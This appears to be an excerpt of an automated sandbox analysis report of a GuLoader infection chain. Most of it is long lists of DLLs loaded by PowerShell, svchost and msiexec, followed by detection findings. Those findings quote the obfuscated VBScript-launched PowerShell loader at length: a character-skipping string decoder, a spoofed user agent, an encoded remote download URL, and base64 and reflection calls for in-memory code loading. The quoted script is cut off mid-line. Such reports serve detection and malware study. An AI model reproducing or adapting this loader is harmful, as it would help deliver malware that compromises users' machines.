              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: ystem.Core.pdb source: powershell.exe, 0000000D.00000002.1847691545.000000000295F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1373970474.000002A9B65FD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1872980772.00000000071E2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1373809001.000002A9B6525000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1408736409.000002A9CEB10000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1880865485.0000000008280000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Bra", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 0000000D.00000002.1882574423.000000000B684000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1882393823.00000000085B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1401976050.000002A9C69D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.1867994553.0000000005785000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Thioresorcinol)$gLObAL:kVivaLEREs = [systEM.tExT.eNCoding]::aSciI.gEtSTriNG($EkspEDItReNs)$GLobAL:oLFErTS=$KVivALeREs.SUBsTrING($BElEmRiNgEn,$aLTsAXER)<#Neglendes branchiopallial Luk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Modularized $telesm $Pothooks), (Trattens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Baadfarter = [AppDomain]::CurrentDomain.GetAssemblies()$global:Mu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Portesse)), $Spasmer).DefineDynamicModule($Minileagues, $false).DefineType($Hesteskomagneters240, $Stomatoscope, [System.MulticastDele
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Thioresorcinol)$gLObAL:kVivaLEREs = [systEM.tExT.eNCoding]::aSciI.gEtSTriNG($EkspEDItReNs)$GLobAL:oLFErTS=$KVivALeREs.SUBsTrING($BElEmRiNgEn,$aLTsAXER)<#Neglendes branchiopallial Luk
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Postejens; function Subrogate($plankevrks){$Brandfare=4;do{$Hindbrmarmeladers+=$plankevrks[$Brandfare];$Brandfare+=5;$Superfunction=Format-List} until(!$plankevrks[$Brandfare])$Hindbrmarmeladers}function Elektriseringers($Spegeskinkens){ .($Majestternes) ($Spegeskinkens)}$Staahjder211=Subrogate 'solfnFornETroutBech. samW';$Staahjder211+=Subrogate 'Unove ForByewsC entLUninIMeriETrauNOrgaT';$Datafil79=Subrogate 'EngiM TiloDe,azhac i a,vlhag,l oma.rdi/';$fireetageshusenes=Subrogate 'FermT Deslent sSpec1Cond2';$Valutasats='Viab[Farrn.nine Tl T V n.TvisS Plae T.tRcin VTalli ndiCBeslePsykPSto oCaprILechNA.sltD riM K maSpirNUnclaMel g.dseeBrudrS,ov]Evan:Comm:strasprece Diac A tU disR BekiForsT Fo,y IntPIdeaRSlipoFlytTRhodoLedeC B.oo FejLAn u= ndh$UdlifLiteIfi.kr Da E Tr,E UndtM ewAS arGlat E uels erqhDydsuTilsSShreeLevenStevEEspis';$Datafil79+=Subrogate 'Klan5B ll. Und0Ri g Af (rystWRegniG ienAvand tomo edewmalps Noa OverNGaliTBade Fora1 Lym0Ne f.Afkr0mong;Eris Cel WInq i FalnKuns6T yr4At,a;Trst S edx Bol6M ll4Udsk; Bu LaskrAfmnvLo g: Opg1 Sph3 Non4D ed.Befr0Ril,)Nabo Ind,GUba,eRaimcProskAgraokomf/ Age2 Std0Lode1Ta.e0 Beg0Valu1 nsa0 Ber1Fl l E oxFKa.aiBo,irXenoePe afMarkoBasixPou / Pha1Sa.t3Fib 4For,.Fron0';$Archery=Subrogate 'ton,UReciSAd leRechR alg-SnakaP,ecGHeroEVenenclert';$Reask=Subrogate 'MinihA sktMetatKontpPrefs Una:Trof/Irid/U,kadSuprrScomiA ervKompeTilf.BrangGuldoSkudoBal.g E,blAlg e dis.UnilcHalvo L tmsiff/circuRetrc Elf?KrydeIm.oxBebopti soB nzr BovtSfin=LabsdFlodo IrrwBillnWi dl Tilo VagaI oad ndl&FutuiH tbdefte=felt1 wa6Sup sDoomnbaksvIfre_,asm9 org5Nonnwglds0akvan .icE.usy4 pigL HerR AntQSubiiRamifNatubAlekdKrelrHrgeSb.sahServuAdinJMahjPChi.1 ,neXHubmqZarev FidVKnleyB.dvR';$Brandfarempolder=Subrogate 'Ster>';$Majestternes=Subrogate ' caI,apeeAnimx';$Pyroman='Myope';$Frontalitetens='\Fugtservietter.Her';Elektriseringers (Subrogate 'Stig$ illgstill,azzOMesoBTrllAOhmal S.a: umsNeigTDemoy SuirFor IBargnAnteG UbeSP hlaSubsF arsdcitiEf.sklAngaIShanNIndrg C aERigen,quisskan=Begn$Fa oeOx dNPalaVChiv:KommaThysPFlopp undDMacrABirgTPhonaNonr+Lned$AmfefantoRSuppo GhanSke tKr.gaoutsl ejrI nretMicrEPap t.eske da NSt ds');Elektriseringers (Subrogate 'Vild$HusmGTrinlVinroTherbGabbAAraulE it:EfteAOmorSS ffPIndtH SpdAFedeL Rest ReteLapaRW,id=Pe c$ReforLoxoe .onAAnsvs gnaK on.SoloSHamrpChaslF geitusktTing(P.od$UnquB emorP esA Ax NR kodbre FPostaFibrr SekE TjeMLydlpLyssoKre L EthDSwarebu tR on)');Elektriseringers (Subrogate $Valutasats);$Reask=$Asphalter[0];$Fremgangsperiodernes=(Subrogate 'Taar$ XpagFunklsawmO bu.bGeo a,ahoL run:etagAFreiTKogeH flnE croOPrekLWraiOprokg SanYSt,k= dsND odEIndtwInem- UneOSkr BauntJ ,ineFingcAnfrtCand lluSPompYStenSMartTDiskEDa,dmUnun.Peri$Hamms AfgtTr la PorAUndeHLangJDde dHeweEJunerF.es2Munt1 Ent1');Elektriseringers ($Fremgangsperiodernes);Elektriseringers (Subrogate ' Opl$ FinACo,otSalahbedy
